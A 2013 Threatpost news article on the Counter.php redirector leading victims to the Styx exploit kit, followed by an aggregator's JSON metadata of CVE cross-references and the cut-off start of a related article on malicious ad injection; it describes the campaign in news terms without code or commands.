Counter.php Redirecting to Sites Peddling Styx Exploit Kit

2013-08-12T14:52:37

Description

The Counter.php strain of malware has been spotted in the past redirecting users to a handful of malicious sites and now appears to be leveraging that ability to send victims to websites serving up the Styx exploit kit. According to [a post on Securelist today](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>), Vincente Diaz, a researcher with Kaspersky Lab, discovered counter.php while looking into some of the more popular Web attacks in Spain during the past three months. One bit of code in particular, Trojan.JS.iframe.aeq, jumped out at him. At the end of that source code was counter.php, a malicious redirect that uses an iFrame that initially began popping up in Japan and Spain in [February and March](<http://michajp.blogspot.jp/2013/03/malicious-counterphp.html>) of this year. Counter.php in turn led Diaz to stumble upon a site passing out the Styx exploit kit, a pricey $3,000 toolkit that enjoyed its peak of popularity earlier this spring. Thanks to a relatively new botnet named [Fort Disco](<http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites/101723>), researchers found a PHP-redirector earlier this month that also sent victims to sites hosting Styx, suggesting the malicious sites in both situations are one in the same. According to Diaz the exploit kit runs a script function called PluginDetect to profile the victim and determine which version of Java the user is running. It then exploits one of a handful of – mostly Java – vulnerabilities: * “jorg.html” CVE-2013-0422 * “jlnp.html” CVE-2013-2423 * “pdfx.html loads “fnts.html” CVE-2011-3402 * “jovf.html” CVE-2013-1493 * and downloads a .pdf file CVE-2010-0188 Diaz goes on to describe how the sites passing out Styx may have gotten infected, suggesting their FTP accounts may have been compromised. After contacting the sites’ corresponding hosting companies though, Diaz was able to glean a little more about the most recent iteration of counter.php. Looking at the functions and strings, “when users are redirected to counter.php, then there is a second redirection to stat.php,” a filter that helps the kit avoid reinfections and avoid signature detection. “As stat.php does not check that the parameter IP is the remote address, now we know how to create requests for getting samples from the exploit kit,” Diaz said. If all this wasn’t enough, it goes on to install a dropper that downloads a fake antivirus or ZeroAccess Trojan to the infected machine, according to the blog post. Further analysis of that malware is forthcoming, but for Diaz’s in-depth account on Counter.php and how he found the Styx kits, head [here](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>).

{"id": "THREATPOST:EE3F3A8389237EB34791DBD9A0F1066E", "vendorId": null, "type": "threatpost", "bulletinFamily": "info", "title": "Counter.php Redirecting to Sites Peddling Styx Exploit Kit", "description": "The Counter.php strain of malware has been spotted in the past redirecting users to a handful of malicious sites and now appears to be leveraging that ability to send victims to websites serving up the Styx exploit kit.\n\nAccording to [a post on Securelist today](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>), Vincente Diaz, a researcher with Kaspersky Lab, discovered counter.php while looking into some of the more popular Web attacks in Spain during the past three months. One bit of code in particular, Trojan.JS.iframe.aeq, jumped out at him.\n\nAt the end of that source code was counter.php, a malicious redirect that uses an iFrame that initially began popping up in Japan and Spain in [February and March](<http://michajp.blogspot.jp/2013/03/malicious-counterphp.html>) of this year.\n\nCounter.php in turn led Diaz to stumble upon a site passing out the Styx exploit kit, a pricey $3,000 toolkit that enjoyed its peak of popularity earlier this spring.\n\nThanks to a relatively new botnet named [Fort Disco](<http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites/101723>), researchers found a PHP-redirector earlier this month that also sent victims to sites hosting Styx, suggesting the malicious sites in both situations are one in the same.\n\nAccording to Diaz the exploit kit runs a script function called PluginDetect to profile the victim and determine which version of Java the user is running. It then exploits one of a handful of \u2013 mostly Java \u2013 vulnerabilities:\n\n * \u201cjorg.html\u201d CVE-2013-0422\n * \u201cjlnp.html\u201d CVE-2013-2423\n * \u201cpdfx.html loads \u201cfnts.html\u201d CVE-2011-3402\n * \u201cjovf.html\u201d CVE-2013-1493\n * and downloads a .pdf file CVE-2010-0188\n\nDiaz goes on to describe how the sites passing out Styx may have gotten infected, suggesting their FTP accounts may have been compromised. After contacting the sites\u2019 corresponding hosting companies though, Diaz was able to glean a little more about the most recent iteration of counter.php.\n\nLooking at the functions and strings, \u201cwhen users are redirected to counter.php, then there is a second redirection to stat.php,\u201d a filter that helps the kit avoid reinfections and avoid signature detection.\n\n\u201cAs stat.php does not check that the parameter IP is the remote address, now we know how to create requests for getting samples from the exploit kit,\u201d Diaz said.\n\nIf all this wasn\u2019t enough, it goes on to install a dropper that downloads a fake antivirus or ZeroAccess Trojan to the infected machine, according to the blog post. Further analysis of that malware is forthcoming, but for Diaz\u2019s in-depth account on Counter.php and how he found the Styx kits, head [here](<http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top>).\n", "published": "2013-08-12T14:52:37", "modified": "2013-08-12T18:52:37", "cvss": {"vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/", "score": 10.0}, "cvss2": {}, "cvss3": {}, "href": "https://threatpost.com/counter-php-found-redirecting-to-sites-peddling-styx-exploit-kit/101967/", "reporter": "Chris Brook", "references": ["http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top", "http://michajp.blogspot.jp/2013/03/malicious-counterphp.html", "http://threatpost.com/fort-disco-brute-force-attack-campaign-targets-cms-websites/101723", "http://www.securelist.com/en/blog/9151/Visit_from_an_old_friend_Counter_php#page_top"], "cvelist": ["CVE-2010-0188", "CVE-2011-3402", "CVE-2013-0422", "CVE-2013-1493", "CVE-2013-2423"], "immutableFields": [], "lastseen": "2018-10-06T23:00:20", "viewCount": 14, "enchantments": {"score": {"value": 0.4, "vector": "NONE"}, "dependencies": {"references": [{"type": "amazon", "idList": ["ALAS-2013-167", "ALAS-2013-168", "ALAS-2013-183"]}, {"type": "attackerkb", "idList": ["AKB:1D2CCC4C-FFDC-4EF3-97DD-8ED2F9DBF6AA", "AKB:3851E11C-8BE5-48FA-9728-3866A434EA95", "AKB:666ABDA1-BFDE-4A4A-9A1E-D98A2F971F43"]}, {"type": "canvas", "idList": ["ACROBAT_LIBTIFF", "JAVA_DYNAMICBINDING", "JAVA_MBEANINSTANTIATOR_FINDCLASS"]}, {"type": "centos", "idList": ["CESA-2013:0165", "CESA-2013:0602", "CESA-2013:0603", "CESA-2013:0604", "CESA-2013:0605", "CESA-2013:0751", "CESA-2013:0752"]}, {"type": "cert", "idList": ["VU:316553", "VU:625617", "VU:688246"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2010-370", "CPAI-2011-512", "CPAI-2013-007", "CPAI-2013-1345", "CPAI-2013-1685", "CPAI-2013-1714", "CPAI-2013-3486", "CPAI-2014-0023", "CPAI-2014-0833", "CPAI-2014-1119", "CPAI-2014-1622", "CPAI-2015-0221", "CPAI-2015-0735"]}, {"type": "cisa_kev", "idList": ["CISA-KEV-CVE-2010-0188", "CISA-KEV-CVE-2013-0422", "CISA-KEV-CVE-2013-2423"]}, {"type": "cve", "idList": ["CVE-2010-0188", "CVE-2011-2004", "CVE-2011-3402", "CVE-2012-3174", "CVE-2013-0422", "CVE-2013-0809", "CVE-2013-1493", "CVE-2013-2423"]}, {"type": "exploitdb", "idList": ["EDB-ID:24045", "EDB-ID:24904"]}, {"type": "fedora", "idList": ["FEDORA:4363E213A8", "FEDORA:4A3812148A", "FEDORA:7520927A4D", "FEDORA:8C6ED20B26", "FEDORA:B66CF208CD", "FEDORA:D68E221277", "FEDORA:E98B52639F", "FEDORA:EB2552138E"]}, {"type": "fireeye", "idList": ["FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85"]}, {"type": "freebsd", "idList": ["D5E0317E-5E45-11E2-A113-C48508086173"]}, {"type": "gentoo", "idList": ["GLSA-201009-05", "GLSA-201401-30", "GLSA-201406-32"]}, {"type": "ibm", "idList": ["1490E64B6C89A28FE7D82BD31871B5BCF0AA0EDCD3A3B483DF42E4A809F821F4", "1DD17DFA982ED4D61FB750115CB0EF37D8B00E016AE5F0F656377426A5C4EE18", "1F28273F958E55F6FE1789A83C92EDED4F2AAA3B9D872DA2CEAA127470C88CCE", "2888C8C51406BDD1DDB129FA2FD21486139C2B46881E4BF8D52B96F286B243B4", "322619DE13AD7AE40C87D0499D49F5FD2A44C7972AD6C9A81CD50939DF001639", "48C1F15C09B1F7BDA80A9EFEADECD71756B3E935BF8D2C49D4EBF682961DBB6E", "4E588C74A55CD9FFE957FBF604B06826EB4B08A52741A2D771A96FB3782D2303", "5A1CA3A0E7F7A53B001844967849D6C6C96B905BD4AA80A3BDD787CD94067217", "5AB9217FD40496BFAB9EF6AC4C92FA7AEC6A363722C93CDB5F410D5DB4144906", "65F855CBB6E474F39746F43DB188D7D6BFF25111F9027E1DC2947DAACA0066DC", "7395B8BB0E921EA44FC2DA34DC1642BF4297981E52ABAF79CE1C5A075991C089", "893B4BFAF96F5CCE46A3F4BB145D13A37B810A30BC0EF9EEB46E92F43F2965B9", "A866252B75E912D0B0730469904A7C2D30F443084DF2C8AC2265ED850925178B", "B0824DECD569EC7AE160C541030A57A5EB431896666D2D685F4140BE7B47AE7D", "BA5FC59AD4CA540F948C75EA478904F8A2D0A949B970697DAED42B661E911F37", "C84B4AF1E4DFDAA1D01B212AB48E59FAE64DCE886C1682502F098ED789D47987", "CF290EFF4C7173AEEFF7402645BDB2A194F0F98628CB6A0696A28729A7B0CA1D", "CFB76C7955286783207A10F8AD81EE581F67A422A7BCC33041BABFA8A0EAE5C1", "D09ABF92F9241537F2411A406C8EBC7E6385C510450FCBD8E4BEA2A58ED1A1F8", "D5E29C57DFAB7438EA8E4D2CA0EBFEBE3042775F9DE9F26B73540CF67C86757C", "E56E2B116EDD9B36BA0E0A6BEA7E46A462817EFD720A53E8AAFDF37AE51F6FF6", "E85B059661AD26128B8FEABD2D8E50E646FA524B29D1B701A85676E6063ABBB0", "EB78AC88FE6A72527EF5ACB39A0504C53E5B30DCCE48B2F5DC306B16DB8824D2", "EE216EF5D81838DBD9885BCCAD28FE9FA806673A7B6C6F9FD4DC5F95C8DC1B7C", "FD7351ECB85A42C62F9023BAC5EEEAF6CF37D6FC6389D561479E0D751AD3BA8F"]}, {"type": "kaspersky", "idList": ["KLA10544"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT-MULTI-BROWSER-JAVA_JRE17_JMXBEAN-", "MSF:EXPLOIT-WINDOWS-BROWSER-JAVA_CMM-", "MSF:POST-WINDOWS-GATHER-FORENSICS-DUQU_CHECK-"]}, {"type": "mskb", "idList": ["KB2639417", "KB2681578"]}, {"type": "nessus", "idList": ["6664.PRM", "6711.PRM", "6761.PRM", "ADOBE_ACROBAT_APSB10-07.NASL", "ADOBE_READER_APSB10-07.NASL", "ALA_ALAS-2013-167.NASL", "ALA_ALAS-2013-168.NASL", "ALA_ALAS-2013-183.NASL", "CENTOS_RHSA-2013-0165.NASL", "CENTOS_RHSA-2013-0602.NASL", "CENTOS_RHSA-2013-0603.NASL", "CENTOS_RHSA-2013-0604.NASL", "CENTOS_RHSA-2013-0605.NASL", "CENTOS_RHSA-2013-0751.NASL", "CENTOS_RHSA-2013-0752.NASL", "DOMINO_8_5_3FP5.NASL", "DOMINO_9_0_1.NASL", "FEDORA_2013-0853.NASL", "FEDORA_2013-0868.NASL", "FEDORA_2013-0888.NASL", "FEDORA_2013-3467.NASL", "FEDORA_2013-3468.NASL", "FEDORA_2013-5922.NASL", "FEDORA_2013-5958.NASL", "FEDORA_2013-6368.NASL", "FREEBSD_PKG_D5E0317E5E4511E2A113C48508086173.NASL", "GENTOO_GLSA-201009-05.NASL", "GENTOO_GLSA-201401-30.NASL", "GENTOO_GLSA-201406-32.NASL", "LOTUS_DOMINO_8_5_3_FP5.NASL", "LOTUS_DOMINO_9_0_1.NASL", "LOTUS_NOTES_8_5_3_FP5.NASL", "MACOSX_JAVA_10_6_UPDATE14.NASL", "MACOSX_JAVA_2013-002.NASL", "MACOSX_MS12-034.NASL", "MANDRIVA_MDVSA-2013-095.NASL", "MANDRIVA_MDVSA-2013-161.NASL", "OPENSUSE-2013-198.NASL", "OPENSUSE-2013-230.NASL", "OPENSUSE-2013-402.NASL", "OPENSUSE-2013-426.NASL", "OPENSUSE-2013-47.NASL", "ORACLELINUX_ELSA-2013-0165.NASL", "ORACLELINUX_ELSA-2013-0602.NASL", "ORACLELINUX_ELSA-2013-0603.NASL", "ORACLELINUX_ELSA-2013-0604.NASL", "ORACLELINUX_ELSA-2013-0605.NASL", "ORACLELINUX_ELSA-2013-0751.NASL", "ORACLELINUX_ELSA-2013-0752.NASL", "ORACLE_JAVA5_UPDATE41.NASL", "ORACLE_JAVA5_UPDATE41_UNIX.NASL", "ORACLE_JAVA6_UPDATE43.NASL", "ORACLE_JAVA6_UPDATE43_UNIX.NASL", "ORACLE_JAVA7_UPDATE11.NASL", "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "ORACLE_JAVA7_UPDATE17.NASL", "ORACLE_JAVA7_UPDATE17_UNIX.NASL", "ORACLE_JAVA_CPU_APR_2013.NASL", "ORACLE_JAVA_CPU_APR_2013_UNIX.NASL", "REDHAT-RHSA-2010-0114.NASL", "REDHAT-RHSA-2013-0156.NASL", "REDHAT-RHSA-2013-0165.NASL", "REDHAT-RHSA-2013-0600.NASL", "REDHAT-RHSA-2013-0601.NASL", "REDHAT-RHSA-2013-0602.NASL", "REDHAT-RHSA-2013-0603.NASL", "REDHAT-RHSA-2013-0604.NASL", "REDHAT-RHSA-2013-0605.NASL", "REDHAT-RHSA-2013-0624.NASL", "REDHAT-RHSA-2013-0625.NASL", "REDHAT-RHSA-2013-0626.NASL", "REDHAT-RHSA-2013-0751.NASL", "REDHAT-RHSA-2013-0752.NASL", "REDHAT-RHSA-2013-0757.NASL", "REDHAT-RHSA-2013-0822.NASL", "REDHAT-RHSA-2013-1455.NASL", "REDHAT-RHSA-2013-1456.NASL", "SL_20130116_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20130306_JAVA_1_6_0_OPENJDK_ON_SL5_X.NASL", "SL_20130306_JAVA_1_6_0_OPENJDK_ON_SL6_X.NASL", "SL_20130306_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20130306_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SL_20130417_JAVA_1_7_0_OPENJDK_ON_SL5_X.NASL", "SL_20130417_JAVA_1_7_0_OPENJDK_ON_SL6_X.NASL", "SMB_KB2639658.NASL", "SMB_NT_MS11-087.NASL", "SMB_NT_MS12-034.NASL", "SMB_NT_MS12-039.NASL", "SUSE_11_0_ACROREAD-100225.NASL", "SUSE_11_1_ACROREAD-100225.NASL", "SUSE_11_2_ACROREAD-100225.NASL", "SUSE_11_ACROREAD-100225.NASL", "SUSE_11_JAVA-1_4_2-IBM-130415.NASL", "SUSE_11_JAVA-1_6_0-IBM-130416.NASL", "SUSE_11_JAVA-1_6_0-OPENJDK-130307.NASL", "SUSE_11_JAVA-1_7_0-IBM-130306.NASL", "SUSE_11_JAVA-1_7_0-IBM-130415.NASL", "SUSE_ACROREAD-6879.NASL", "SUSE_ACROREAD-6881.NASL", "SUSE_JAVA-1_4_2-IBM-8543.NASL", "SUSE_JAVA-1_5_0-IBM-8542.NASL", "SUSE_JAVA-1_6_0-IBM-8544.NASL", "UBUNTU_USN-1693-1.NASL", "UBUNTU_USN-1755-1.NASL", "UBUNTU_USN-1755-2.NASL", "UBUNTU_USN-1806-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310120283", "OPENVAS:1361412562310120385", "OPENVAS:1361412562310120386", "OPENVAS:1361412562310121127", "OPENVAS:1361412562310121235", "OPENVAS:1361412562310123638", "OPENVAS:1361412562310123639", "OPENVAS:1361412562310123675", "OPENVAS:1361412562310123676", "OPENVAS:1361412562310123677", "OPENVAS:1361412562310123679", "OPENVAS:1361412562310123748", "OPENVAS:136141256231069029", "OPENVAS:1361412562310802500", "OPENVAS:1361412562310803156", "OPENVAS:1361412562310803327", "OPENVAS:1361412562310803488", "OPENVAS:1361412562310804267", "OPENVAS:1361412562310841283", "OPENVAS:1361412562310841350", "OPENVAS:1361412562310841352", "OPENVAS:1361412562310841405", "OPENVAS:1361412562310850427", "OPENVAS:1361412562310850435", "OPENVAS:1361412562310850436", "OPENVAS:1361412562310865053", "OPENVAS:1361412562310865170", "OPENVAS:1361412562310865175", "OPENVAS:1361412562310865432", "OPENVAS:1361412562310865458", "OPENVAS:1361412562310865570", "OPENVAS:1361412562310865577", "OPENVAS:1361412562310870889", "OPENVAS:1361412562310870949", "OPENVAS:1361412562310870950", "OPENVAS:1361412562310870956", "OPENVAS:1361412562310870957", "OPENVAS:1361412562310870981", "OPENVAS:1361412562310870982", "OPENVAS:1361412562310881557", "OPENVAS:1361412562310881564", "OPENVAS:1361412562310881621", "OPENVAS:1361412562310881623", "OPENVAS:1361412562310881649", "OPENVAS:1361412562310881655", "OPENVAS:1361412562310881715", "OPENVAS:1361412562310881718", "OPENVAS:1361412562310902128", "OPENVAS:1361412562310902129", "OPENVAS:1361412562310902678", "OPENVAS:1361412562310902767", "OPENVAS:1361412562310902832", "OPENVAS:1361412562310902842", "OPENVAS:69029", "OPENVAS:802500", "OPENVAS:803156", "OPENVAS:803327", "OPENVAS:803488", "OPENVAS:841283", "OPENVAS:841350", "OPENVAS:841352", "OPENVAS:841405", "OPENVAS:850427", "OPENVAS:850435", "OPENVAS:850436", "OPENVAS:865053", "OPENVAS:865170", "OPENVAS:865175", "OPENVAS:865432", "OPENVAS:865458", "OPENVAS:865570", "OPENVAS:865577", "OPENVAS:870889", "OPENVAS:870949", "OPENVAS:870950", "OPENVAS:870956", "OPENVAS:870957", "OPENVAS:870981", "OPENVAS:870982", "OPENVAS:881557", "OPENVAS:881564", "OPENVAS:881621", "OPENVAS:881623", "OPENVAS:881649", "OPENVAS:881655", "OPENVAS:881715", "OPENVAS:881718", "OPENVAS:902678", "OPENVAS:902767", "OPENVAS:902832", "OPENVAS:902842"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0165", "ELSA-2013-0602", "ELSA-2013-0603", "ELSA-2013-0604", "ELSA-2013-0605", "ELSA-2013-0751", "ELSA-2013-0752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119472", "PACKETSTORM:120999", "PACKETSTORM:87212", "PACKETSTORM:87308"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:A730164ABD0AA0A58D62EAFAB48628AD"]}, {"type": "redhat", "idList": ["RHSA-2010:0114", "RHSA-2013:0156", "RHSA-2013:0165", "RHSA-2013:0600", "RHSA-2013:0601", "RHSA-2013:0602", "RHSA-2013:0603", "RHSA-2013:0604", "RHSA-2013:0605", "RHSA-2013:0624", "RHSA-2013:0625", "RHSA-2013:0626", "RHSA-2013:0751", "RHSA-2013:0752", "RHSA-2013:0757", "RHSA-2013:0822", "RHSA-2013:1455", "RHSA-2013:1456"]}, {"type": "saint", "idList": ["SAINT:101C2C596BBA4E4C4075B5443F8DE468", "SAINT:30B6CFDC962268E8CEAB02B936B3AA0D", "SAINT:51A2291C38A67B94F1A59FA697D24885", "SAINT:5ABFB6A96BA9FBA98D7E0D7B84F21EE8", "SAINT:5F92C99B93BF0BC9F289E04FB20426DE", "SAINT:6AB211FEE288DCE3E206BE06C8E87388", "SAINT:6D298D85D6E7CC4DA9D610BBAE648018", "SAINT:88232B8AB0FF77BFB96B8B377F7FCC91", "SAINT:95FFF6793FF19509924D6AF152CDEE79", "SAINT:9AD9476D8EB15E21C99160959F48E5D8", "SAINT:A4279A54731FBED2154E23C3F5839BB9", "SAINT:AC5E9A6AF4F1B07FD20936B034DA0A4D", "SAINT:ADBCEB1FB086DA5B935080CE40F6277F", "SAINT:B859AECDBB7016A3F1E3446FE83018A3", "SAINT:C909E7EC4CC7635CEF755B362D73557E", "SAINT:CE931E8670DCC9F78E1487CB876EBA2E", "SAINT:CEDFBD81AB9307D6A2759A5286D8F39E", "SAINT:D5BB5F482A2457E3A68B487877468626", "SAINT:E7792D5FC9067F389F8BD984BD06BD44", "SAINT:FB34720C0A10EC0A4A4313973C6D2208"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:23390", "SECURITYVULNS:DOC:28971", "SECURITYVULNS:DOC:29161", "SECURITYVULNS:DOC:29162", "SECURITYVULNS:DOC:30343", "SECURITYVULNS:VULN:10516", "SECURITYVULNS:VULN:12090", "SECURITYVULNS:VULN:12357", "SECURITYVULNS:VULN:12406", "SECURITYVULNS:VULN:12827", "SECURITYVULNS:VULN:13016", "SECURITYVULNS:VULN:13590"]}, {"type": "seebug", "idList": ["SSV:19156", "SSV:19277", "SSV:60585", "SSV:60593", "SSV:61553", "SSV:77783", "SSV:78588"]}, {"type": "suse", "idList": ["OPENSUSE-SU-2013:0199-1", "OPENSUSE-SU-2013:0430-1", "OPENSUSE-SU-2013:0438-1", "SUSE-SU-2013:0434-1", "SUSE-SU-2013:0440-1", "SUSE-SU-2013:0701-1", "SUSE-SU-2013:0701-2", "SUSE-SU-2013:0710-1"]}, {"type": "symantec", "idList": ["SMNTC-38195", "SMNTC-57246", "SMNTC-58238", "SMNTC-59162"]}, {"type": "thn", "idList": ["THN:4EAA4FEF21F8E68A90003CC58D6639E2", "THN:B322DFBE39D6B1984ECCA4237D6EB6EB"]}, {"type": "threatpost", "idList": ["THREATPOST:0A9F9D2C917F57EAE16B15B6166B45F6", "THREATPOST:10E07EA1EC79D258B439B4CA2F562B51", "THREATPOST:191B75DFBFEAFA9F2F649D66191A07C9", "THREATPOST:1930272869F47EB9224C7FAB6F1DC5B1", "THREATPOST:456A3BB9FB7D16110E8A4ABAC506A95F", "THREATPOST:53FFA3071578083E01768081147BA316", "THREATPOST:5881049DF0819D9F1F2AEFE35F853C68", "THREATPOST:635801BB456AF20B4CCF183C2BD94E5A", "THREATPOST:71FAF5C8B8166ABAD05E8FE140683412", "THREATPOST:770B6E17E4B8181D31E215933E54652B", "THREATPOST:77484EF7D9FBC087726C972CAA2EAD32", "THREATPOST:7A66D3AC7210BC6168B3777DC0419A88", "THREATPOST:7B46C96564251E67650F604C0B32BC46", "THREATPOST:8C3A036DB8F89D3EF360D44B4BFEF81F", "THREATPOST:8EC50F1755EA55A58BB75546EB1CB667", "THREATPOST:957A3FEFD479E0736CDB1542A4319181", "THREATPOST:988117842525F1F414002817E6166A11", "THREATPOST:A16EDEF0DAAD6325A7D930BE82C2B01C", "THREATPOST:A409650D36A0CEDF6AA296652FEFB33B", "THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "THREATPOST:AFC9652044AAA8085D4A4A3B6D721484", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62", "THREATPOST:B8DB71E5E0488AEEA372885905AC2E7C", "THREATPOST:BE60E44ECF7AB415C00BABCA0001D0A6", "THREATPOST:C404EBFD14DC830CEDE2FF6F7565FAE6", "THREATPOST:CD301FF1D3DD46EB2F853FDCD1BEC6DE", "THREATPOST:D28B11CA5BD698B7DBA755347444B7A2", "THREATPOST:E11864189C14E8A77A62BA875C735AA4", "THREATPOST:E88DFBEC6B78D86A1E68E98C05E24C04", "THREATPOST:E9BF216DCC61669F4F582E1BBBAC6123", "THREATPOST:FC1FB8B56F9BBADC1A51E615FCAF0C39"]}, {"type": "ubuntu", "idList": ["USN-1693-1", "USN-1755-1", "USN-1755-2", "USN-1806-1"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2010-0188", "UB:CVE-2012-3174", "UB:CVE-2013-0422", "UB:CVE-2013-0809", "UB:CVE-2013-1493", "UB:CVE-2013-2423"]}, {"type": "zdi", "idList": ["ZDI-13-002", "ZDI-13-142", "ZDI-13-148", "ZDI-13-149"]}, {"type": "zdt", "idList": ["1337DAY-ID-20155", "1337DAY-ID-20578"]}]}, "backreferences": {"references": [{"type": "amazon", "idList": ["ALAS-2013-167", "ALAS-2013-183"]}, {"type": "attackerkb", "idList": ["AKB:666ABDA1-BFDE-4A4A-9A1E-D98A2F971F43"]}, {"type": "canvas", "idList": ["JAVA_MBEANINSTANTIATOR_FINDCLASS"]}, {"type": "centos", "idList": ["CESA-2013:0165", "CESA-2013:0602", "CESA-2013:0603", "CESA-2013:0604", "CESA-2013:0605", "CESA-2013:0751", "CESA-2013:0752"]}, {"type": "cert", "idList": ["VU:625617"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2013-007"]}, {"type": "cve", "idList": ["CVE-2010-0188"]}, {"type": "exploitdb", "idList": ["EDB-ID:24045", "EDB-ID:24904"]}, {"type": "fedora", "idList": ["FEDORA:E98B52639F"]}, {"type": "fireeye", "idList": ["FIREEYE:4F902DE9FF06143FF34DC80FDBD2AC85"]}, {"type": "freebsd", "idList": ["D5E0317E-5E45-11E2-A113-C48508086173"]}, {"type": "gentoo", "idList": ["GLSA-201401-30"]}, {"type": "ibm", "idList": ["B0824DECD569EC7AE160C541030A57A5EB431896666D2D685F4140BE7B47AE7D"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/BROWSER/JAVA_JRE17_REFLECTION_TYPES", "MSF:EXPLOIT/WINDOWS/BROWSER/JAVA_CMM", "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_LIBTIFF", "MSF:POST/WINDOWS/GATHER/FORENSICS/DUQU_CHECK"]}, {"type": "mskb", "idList": ["KB2639417"]}, {"type": "nessus", "idList": ["CENTOS_RHSA-2013-0603.NASL", "OPENSUSE-2013-198.NASL", "ORACLE_JAVA7_UPDATE11_UNIX.NASL", "REDHAT-RHSA-2013-0156.NASL", "REDHAT-RHSA-2013-0600.NASL", "REDHAT-RHSA-2013-0751.NASL", "UBUNTU_USN-1806-1.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310123639", "OPENVAS:1361412562310123679", "OPENVAS:1361412562310841352", "OPENVAS:1361412562310850427", "OPENVAS:1361412562310881564", "OPENVAS:1361412562310881623", "OPENVAS:69029", "OPENVAS:802500", "OPENVAS:850435", "OPENVAS:870956", "OPENVAS:881715", "OPENVAS:902678"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0602", "ELSA-2013-0603", "ELSA-2013-0604", "ELSA-2013-0605", "ELSA-2013-0751", "ELSA-2013-0752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:119472"]}, {"type": "redhat", "idList": ["RHSA-2013:0600", "RHSA-2013:0601", "RHSA-2013:0602", "RHSA-2013:0603", "RHSA-2013:0605", "RHSA-2013:0751", "RHSA-2013:0752", "RHSA-2013:0757"]}, {"type": "saint", "idList": ["SAINT:B859AECDBB7016A3F1E3446FE83018A3", "SAINT:E7792D5FC9067F389F8BD984BD06BD44"]}, {"type": "securelist", "idList": ["SECURELIST:FA58963C07F2F288FA3096096F60BCF3"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:28971"]}, {"type": "seebug", "idList": ["SSV:60585"]}, {"type": "suse", "idList": ["SUSE-SU-2013:0434-1"]}, {"type": "symantec", "idList": ["SMNTC-57246"]}, {"type": "threatpost", "idList": ["THREATPOST:A53F2293D6BF2EC7D120A2CC2B3D2524", "THREATPOST:B24E4C9E412A2DFD6F2A4933D9F98D62"]}, {"type": "ubuntu", "idList": ["USN-1755-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2013-2423"]}, {"type": "zdi", "idList": ["ZDI-13-149"]}, {"type": "zdt", "idList": ["1337DAY-ID-20155"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2010-0188", "epss": "0.974970000", "percentile": "0.999520000", "modified": "2023-03-15"}, {"cve": "CVE-2011-3402", "epss": "0.969090000", "percentile": "0.994800000", "modified": "2023-03-15"}, {"cve": "CVE-2013-0422", "epss": "0.974510000", "percentile": "0.998970000", "modified": "2023-03-15"}, {"cve": "CVE-2013-1493", "epss": "0.969140000", "percentile": "0.994840000", "modified": "2023-03-15"}, {"cve": "CVE-2013-2423", "epss": "0.975210000", "percentile": "0.999710000", "modified": "2023-03-15"}], "vulnersScore": 0.4}, "_state": {"dependencies": 1678917980, "score": 1683995507, "epss": 1678938645}, "_internal": {"score_hash": "cb0a5734dd602dcf42aee5432eb7c9f7"}}

{"threatpost": [{"lastseen": "2018-10-06T23:00:36", "description": "As many as 65 websites have been compromised in an attack that has snared another Washington, D.C.-area media website as well as a number of travel and leisure sites.\n\nWhile the sites aren\u2019t topically related, they\u2019re all hosting advertisements injected with malicious code hosted on googlecodehosting[.]com, googlecodehosting[.]org and googlecodehosting[.]net, all of which resolve to the same IP address, security company Zscaler said. The IP is currently offline.\n\nThe ads were delivered by openxadvertising[.]com, which Google SafeBrowsing is blocking, Zscaler said. The attacks are exploiting two Java vulnerabilities [CVE-2013-1493](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1493>) and [CVE-2013-2423](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2423>), both of which are being used to drop [the ZeroAccess Trojan](<http://threatpost.com/zeroaccess-botnet-cashing-click-fraud-and-bitcoin-mining-103012/>) on affected machines, Zscaler said.\n\nZeroAccess is financial malware that deals in click-fraud, Bitcoin theft and includes rootkit capabilities that help it avoid detection from security software. It\u2019s spread primarily through a number of botnets, including [peer-to-peer botnets](<http://threatpost.com/peer-to-peer-botnets-resilient-to-takedown-attempts/>).\n\nGovernment Security News reported this week that its site had been compromised and that Google was warning visitors of malware on the site. GSN covers government-related IT and physical security issues.\n\n\u201cAt first, _GSN_ thought we were a random victim of a cyber-attack with no specific target. Alternatively, we thought we might have been a specific target of what is sometimes called a \u201cspear-fishing attack,\u201d aimed at a single company or organization,\u201d a post on the website said. \u201cBut during the course of Monday, June 17, we learned from a respected malware detection company that its cyber-attack technical experts had encountered the same attack several times in recent days, each aimed at a different media company. One attack was aimed at a radio station in Washington, DC; another was targeted at a public affairs-oriented news organization.\u201d\n\nRadio station WTOP and Federal News 